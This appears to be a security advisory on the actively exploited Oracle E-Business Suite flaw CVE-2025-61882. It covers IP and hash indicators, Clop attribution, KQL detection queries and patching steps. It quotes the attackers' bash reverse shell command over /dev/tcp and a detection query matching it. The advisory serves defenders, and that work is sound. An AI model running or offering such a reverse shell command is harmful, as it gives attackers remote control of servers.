Oracle has issued an emergency alert regarding a critical unauthenticated remote code execution (RCE) vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. The flaw, residing in the BI Publisher Integration component of Oracle Concurrent Processing, has been actively exploited by the Clop ransomware group in targeted data theft attacks as recently as August 2025.

The flaw, which carries a CVSS score of 9.8, affects Oracle EBS versions 12.2.3 through 12.2.14. Oracle has now confirmed the attacks and has shared specific Indicators of Compromise (IOCs), including two malicious IP addresses used to deliver the payload and exfiltrate data.

Key Indicators of Exploitation

Oracle has published technical indicators linked to the active exploitation of this vulnerability. Two specific IP addresses have been observed delivering HTTP GET and POST requests to vulnerable Oracle EBS systems:

• 200.107.207.26
• 185.181.60.11

These IPs are believed to be associated with Clop’s infrastructure and were used to deliver Python-based reverse shell payloads or directly execute commands on targeted systems.

Reverse Shell Command

Attackers deployed the following shell command via the exploit:

sh -c /bin/bash -i >& /dev/tcp/[malicious_IP]/[port] 0>&1

This command establishes a reverse shell, enabling attackers to take remote control of the server.

Exploit Files Identified:

Oracle has listed the following SHA-256 hashes for the exploit archive and Python scripts used:

• Exploit ZIP Archive:
  76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d
• Python Scripts Inside ZIP:
  aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 (exp.py)
  6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b (server.py)

Threat Actor Attribution

The attacks have been attributed to the Clop ransomware gang, known for exploiting zero-days in major data exfiltration campaigns (Accellion, MOVEit, GoAnywhere, etc.). However, the initial leak of the Oracle exploit appears to originate from a new group calling themselves “Scattered Lapsus$ Hunters”, who shared the toolset on Telegram and referenced Clop in the archive’s filename.

While the precise relationship between Clop and Scattered Lapsus$ Hunters remains unclear, the exploit’s leak suggests possible collaboration, code sharing, or resale between threat actors.

Detection: KQL Query for Microsoft Defender & Sentinel

Security teams using Microsoft Defender for Endpoint or Microsoft Sentinel can use the following KQL (Kusto Query Language) to detect suspicious activity associated with the Oracle EBS exploit:

DeviceNetworkEvents
| where RemoteIP in ("200.107.207.26", "185.181.60.11")
  and ActionType in ("ConnectionSuccess", "ConnectionAttempt", "InboundConnectionAccepted")
| summarize EventCount = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, RemoteIP, InitiatingProcessFileName, ReportId
| order by LastSeen desc

🔍 Purpose: Detects any successful or attempted connections to the two malicious IPs from endpoints in your environment.

For deeper inspection of reverse shell behavior and payloads:

DeviceProcessEvents
| where ProcessCommandLine has_all ("bash", "/dev/tcp")
  or ProcessCommandLine contains "/bin/bash -i >& /dev/tcp"
| summarize EventCount = count(), FirstSeen = min(Timestamp), LastSeen = max(Timestamp) by DeviceName, InitiatingProcessFileName, ProcessCommandLine
| order by LastSeen desc

🎯 Purpose: Detects execution of reverse shell commands typically used in this Oracle EBS exploit.

Recommended Actions

Patch Immediately

Admins must install the October 2023 CPU (Critical Patch Update) before applying the emergency fix for CVE-2025-61882.

Hunt & Monitor

Use the above KQL queries to search historical logs for signs of compromise or ongoing exploitation.

Harden Oracle EBS

• Isolate Oracle EBS from internet exposure where possible
• Apply strict network ACLs
• Enable detailed logging and alerting on shell access, Python scripts, and unusual network connections

Block Malicious IPs

Immediately block outbound/inbound connections to:

• 200.107.207.26
• 185.181.60.11

Conclusion

The exploitation of CVE-2025-61882 represents a high-risk, active threat to Oracle E-Business Suite deployments. Organizations using vulnerable versions must prioritize patching and proactively monitor for suspicious access attempts. Clop’s continued use of zero-days and sophisticated supply-chain tactics underscores the urgent need for zero-trust segmentation, rapid patch cycles, and threat hunting capabilities in enterprise environments.